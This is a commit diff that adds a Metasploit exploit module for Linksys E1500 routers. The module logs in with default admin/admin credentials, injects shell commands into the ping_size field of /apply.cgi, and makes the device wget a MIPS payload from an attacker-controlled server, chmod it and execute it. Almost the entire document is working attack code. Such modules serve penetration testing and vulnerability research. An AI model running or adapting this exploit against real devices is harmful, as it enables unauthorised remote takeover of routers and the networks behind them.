make msftidy happy

Author: m-1-k-3

modules/exploits/linux/http/linksys_e1500_up_exec.rb

@@ -0,0 +1,192 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::Remote::HttpServer
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'        => 'Linksys E1500 Command Execution - Upload and Execute',
+			'Description' => %q{
+					This module can be used to execute a payload on Linksys Routers
+			},
+			'Author'      => [ 'Michael Messner <[email protected]>'],
+			'License'     => MSF_LICENSE,
+			'References'  =>
+				[
+					[ 'BID', '57760' ],
+					[ 'EDB', '24475' ],
+					[ 'OSVDB', '89912' ],
+					[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ]
+				],
+			'DisclosureDate' => 'Feb 05 2013',
+			'Privileged'  => true,
+			'Platform'       => [ 'linux' ],
+			'Arch'           => ARCH_MIPSLE,
+			'Targets'        => [[ 'Automatic', { }]],
+			'Payload'      =>
+				{
+					'Space'       => 1024,
+					'DisableNops' => true,
+				},
+			'DefaultTarget'  => 0
+			))
+
+		register_options(
+			[
+				Opt::RPORT(80),
+				OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
+				OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]),
+				OptString.new('DOWNHOST',  [ false, 'The host to request the MIPS payload from' ]),
+				OptString.new('DOWNFILE',  [ false, 'Filename to download, (default: random)', nil ]),
+				OptString.new('SRVHOST',  [ true, 'The local host to listen on. This must be an address on the local machine' ]),
+			], self.class)
+	end
+
+	#MISSING - command execution payload
+
+	def request(cmd,user,pass,uri)
+		begin
+			res = send_request_cgi({
+				'uri'    => uri,
+				'method' => 'POST',
+				'authorization' => basic_auth(user,pass),
+				'vars_post' => {
+					"submit_button" => "Diagnostics",
+					"change_action" => "gozila_cgi",
+					"submit_type" => "start_ping",
+					"action" => "",
+					"commit" => "0",
+					"ping_ip" => "1.1.1.1",
+					"ping_size" => "&#{cmd}&",
+					"ping_times" => "5",
+					"traceroute_ip" => ""
+				}
+			})
+
+			if (! res)
+				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload [No Response]")
+			end
+
+		rescue ::Rex::ConnectionError
+			vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+			return
+		end
+	end
+
+	def exploit
+		downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
+		uri = '/apply.cgi'
+		user = datastore['USERNAME']
+		pass = datastore['PASSWORD']
+		rhost = datastore['RHOST']
+		rport = datastore['RPORT']
+
+		# We must regenerate the payload-> not sure if this is the right way
+		arch = "ARCH_MIPSLE"
+		plat = "linux"
+		p = exploit_regenerate_payload(plat, arch)
+		@pl = p.encoded_exe
+
+		#
+		# start our server
+		#
+		resource_uri = '/' + downfile
+		service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+		print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+		start_service({'Uri' => {
+				'Proc' => Proc.new { |cli, req|
+					on_request_uri(cli, req)
+				},
+				'Path' => resource_uri
+			}})
+
+		if (datastore['DOWNHOST'])
+			service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+		end
+
+
+		#
+		# testing Login
+		#
+
+		print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
+
+		begin
+			res = send_request_cgi({
+				'uri'     => uri,
+				'method'  => 'GET',
+				'authorization' => basic_auth(user,pass)
+				})
+
+			return if res.nil?
+			return if (res.code == 404)
+
+			if [200, 301, 302].include?(res.code)
+				print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
+			else
+				print_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
+				return
+			end
+
+		rescue ::Rex::ConnectionError
+			vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+			return
+		end
+
+		print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
+
+		#this filename is used to store the payload on the device
+		filename = rand_text_alpha_lower(8)
+
+		cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
+
+		request(cmd,user,pass,uri)
+
+		#
+		# chmod
+		#
+
+		cmd = "chmod 777 /tmp/#{filename}"
+
+		print_status("#{rhost}:#{rport} - Asking the Linksys device to prepare #{downfile}")
+
+		request(cmd,user,pass,uri)
+
+		#
+		# execute
+		#
+
+		cmd = "/tmp/#{filename}"
+
+		print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
+
+		request(cmd,user,pass,uri)
+
+		handler
+	end
+
+
+#	# Handle incoming requests from the server
+	def on_request_uri(cli, request)
+
+		#print_status("on_request_uri called: #{request.inspect}")
+		if (not @pl)
+			print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+			return
+		end
+
+		print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+		send_response(cli, @pl)
+	end
+
+end